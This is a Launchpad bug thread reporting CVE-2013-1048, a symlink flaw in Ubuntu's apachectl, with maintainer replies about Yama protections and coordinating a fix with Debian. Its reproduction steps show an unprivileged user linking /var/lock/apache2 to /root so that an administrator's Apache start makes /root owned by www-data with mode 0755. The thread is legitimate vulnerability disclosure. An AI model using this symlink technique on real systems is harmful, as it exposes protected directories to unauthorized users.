/usr/sbin/apachectl privilege escalation

Confirmed, 12.10 dmesg reports:

[ 1602.905898] non-matching-uid symlink following attempted in sticky world-writable directory by rm (fsuid 0 != 1000)
[ 1602.905907] non-matching-uid symlink following attempted in sticky world-writable directory by rm (fsuid 0 != 1000)
[ 1602.906352] non-matching-uid symlink following attempted in sticky world-writable directory by rm (fsuid 0 != 1000)
[ 1602.906355] non-matching-uid symlink following attempted in sticky world-writable directory by rm (fsuid 0 != 1000)

Thanks Hayawardh

This is CVE-2013-1048

Hayawardh,

We've contacted the Debian security team, we're coordinating an update with them.

Thanks

On Ubuntu 10.10 and later this isn't an issue because of Yama sumlink restrictions.
What version of Ubuntu did you try this on?

You are right. I had disabled Yama. In any case it would be a problem for
10.04?

Thanks,
Hayawardh
On Jan 25, 2013 3:55 PM, "Marc Deslauriers" <email address hidden>
wrote:

> On Ubuntu 10.10 and later this isn't an issue because of Yama sumlink
> restrictions.
> What version of Ubuntu did you try this on?
>
> --
> You received this bug notification because you are subscribed to the bug
> report.
> https://bugs.launchpad.net/bugs/1104049
>
> Title:
> /usr/sbin/apachectl privilege escalation
>
> Status in “apache2” package in Ubuntu:
> Confirmed
>
> Bug description:
> Dear all,
>
> The /usr/sbin/apachectl script allows unprivileged local users to
> change the permissions of any directory to 0755 and in addition make
> the user www-data its owner.
>
> The script has a line:
>
> start)
> ...
> install -d -o ${APACHE_RUN_USER:-www-data}
> ${APACHE_LOCK_DIR:-/var/lock/apache2}
>
> Since in Ubuntu the /var/lock directory has world-writable permissions,
> a user can create a symbolic link to any directory. An administrator then
> starts Apache through /etc/init.d/apache2, which in turn calls the script
> /usr/sbin/apachectl which will change the permissions of the directory
> pointed to by the symbolic link to 0755 and in addition, make the user
> www-data its owner.
>
> Details:
> =====
> root@u32d:~# apt-cache policy apache2.2-common
> apache2.2-common:
> Installed: 2.2.22-1ubuntu1
> Candidate: 2.2.22-1ubuntu1.2
> Version table:
> 2.2.22-1ubuntu1.2 0
> 500 http://us.archive.ubuntu.com/ubuntu/ precise-updates/main
> i386 Packages
> 500 http://security.ubuntu.com/ubuntu/ precise-security/main
> i386 Packages
> *** 2.2.22-1ubuntu1 0
> 500 http://us.archive.ubuntu.com/ubuntu/ precise/main i386
> Packages
> 100 /var/lib/dpkg/status
>
> root@u32d:~# lsb_release -rd
> Description: Ubuntu 12.04 LTS
> Release: 12.04
>
> Steps to reproduce vulnerability on Ubuntu 12.04 LTS (also applicable
> to Quantal 12.10):
>
> As an untrusted user, create a symbolic link in /var/lock to a
> directory the user does not have read/search permission (e.g., /root):
>
> hayawardh@u32d:~$ ls -ld /root
> drwx------. 14 root root 4096 Jan 24 08:23 /root
>
> hayawardh@u32d:~$ cd /var/lock
> hayawardh@u32d:/var/lock$ ln -s /root apache2
>
> Wait for the administrator to start Apache
>
> root@u32d:~# /etc/init.d/apache2 start
> * Starting web server apache2
> apache2: Could not reliably determine the server's fully qualified
> domain name, using 127.0.1.1 for ServerName
> ...done.
>
> Now check permissions of /root:
> root@u32d:~# ls -ld /root
> drwxr-xr-x. 14 www-data root 4096 Jan 24 08:23 /root
>
> Fixing this does not seem straightforward because install opens the
> file to change permissions (in this case, /var/lock/apache2) without
> O_NOFOLLOW, and there does not seem to be a command line switch for
> the same.
>
> Portion of strace output for install -d -o ${APACHE_RUN_USER:-www-
> data} ${APACHE_LOCK_DIR:-/var/lock/apache2}
>
> mkdir("/var", 0755) = -1 EEXIST (File exists)
...